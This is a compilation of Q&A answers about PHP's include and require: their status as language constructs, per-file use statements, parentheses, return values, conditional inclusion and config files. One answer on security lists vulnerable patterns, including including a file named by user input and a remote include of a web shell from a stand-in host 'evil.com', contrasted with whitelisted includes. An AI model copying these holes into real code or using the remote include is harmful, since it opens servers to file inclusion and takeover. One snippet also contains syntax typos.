Is php's 'include' a function or a statement?
Quoting from the manual (my emphasis)
Because include() is a special language construct, parentheses are not needed around its argument.
These are also called "special forms", and include such things as echo
and return
statements. Note that while none of these are functions, you can still speak of expressions and statements, the difference being the former have a value while the latter don't. Since include
, include_once
, require
and require_once
all return a value (TRUE
if the include was successful), they can be used in expressions. By this reasoning, "include statement" would be incorrect, though include
s are almost always used as statements.
Why can't 'use' statement be in include file?
The PHP manual is saying this:
The use keyword must be declared in the outermost scope of a file (the global scope) or inside namespace declarations. [...] Importing rules are per file basis, meaning included files will NOT inherit the parent file's importing rules.
The "Importing rules are per file basis"
part being the important one here.
You can use PHPMailer\PHPMailer\PHPMailer
in your include
file, but that only means that PHPMailer
(without having to specify the full class name) will be available inside your include
file and not in the parent file (the one which includes your include
file).
tl;dr
You need to specify your use ...;
statements in every file you want that specific use
to apply.
When should I use parenthesis in require/include statements?
You are allowed to use parentheses in 'include/require' not because include allows it itself but because you can use parentheses around any string or number in PHP for grouping.
So for example, "dog"
is equivalent to ("dog")
, ("dog")."dog"
is equivalent to "dog"."dog"
, etc.
Parentheses become useful when you use complex expressions involving calculations and string concatenations but in such a simple case, they are simply allowed and perform an unnecessary and harmless "grouping" of a single string value.
PHP - Is include function secure?
It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.
Insecure (Directory Traversal)
<?php
include($_GET['file']);
?>
Insecure (URL fopen - If enabled)
<?php
include('http://evil.com/c99shell.php');
?>
Insecure
<?php
include('./some_dir/' . $_GET['file']);
?>
Partially Insecure ( *.php files are vulnerable )
<?php
include('./some_dir/' . $_GET['file'] . '.php');
?>
Secure (Though not sure why anyone would do this.)
<?php
$allowed = array(
'somefile.php',
'someotherfile.php'
);
if (in_array(basename($_GET['file']), $allowed)) {
include('./includes/' . basename($_GET['file']));
}
?>
Secure
<?php
include('./includes/somefile.php');
?>
PHP include/require within a function
You can return data from included file into calling file via return
statement.
include.php
return array("code" => "007", "name => "James Bond");
file.php
$result = include_once "include.php";
var_dump("result);
But you cannot call return $something;
and have it as return statement within calling script. return
works only within current scope.
EDIT:
I am looking to do this as I have lots
of functions in separate files and
they all have a large chunk of shared
code at the top.
In this case why don't you put this "shared code" into separate functions instead -- that will do the job nicely as one of the purposes of having functions is to reuse your code in different places without writing it again.
If an include() is conditional, will PHP include the file even if the condition is not met?
No, PHP will execute include in the moment the code fragment is reached.
This is quite important, because you can have php include file with code directly. E.g.
File1:
<?php echo "Foo"; ?>
File2:
<?php
echo "Before";
include("File1");
echo "After";
?>
Sometimes your PHP processor won't even know at compiletime which file to include. Imagine something like include("File".mt_rand(1,10));
. PHP won't know the filename to include up to the very moment it reaches the include statement.
Is it common to have just a return statement in a php file
No it isn't very common to have just a return statement, but it is used sometimes to store the configuration information in a separate config.php
file so that the config can be included elsewhere with php require
.
//config.php
<?php
return [
'app_key' => 'SomeRandomString',
'app_secret' => 'SomeRandomString',
];
// other-file.php
<?php
$config = require 'path/to/config.php';
$facebook = new Facebook($config['app_key'], $config['app_secret']);
Related Topics
How So I Convert This Sha256 + Base64 from Swift to PHP
Are PHP Associative Arrays Ordered
Using Value of a Column as Index in Results Using Pdo
Applied Coupons Disable Free Shipping Conditionally in Woocommerce
Check to See If a String Is Serialized
How to Execute Raw Queries with Laravel 5.1
How to Enable PHP to Work with Postgresql
PHP Linefeeds (\N) Not Working
Preg_Match Equivalent in Swift
Replace Only First Match Using Preg_Replace
Permission Denied with Bash.Sh to Run Cron
Convert Number to Letter with PHP
How to Implode Array with Key and Value Without Foreach in PHP
Mysqli_Real_Connect(): (Hy000/2002): No Such File or Directory
Detecting Ajax in PHP and Making Sure Request Was from My Own Website
Wampserver PHPmyadmin Maximum Execution Time of 360 Seconds Exceeded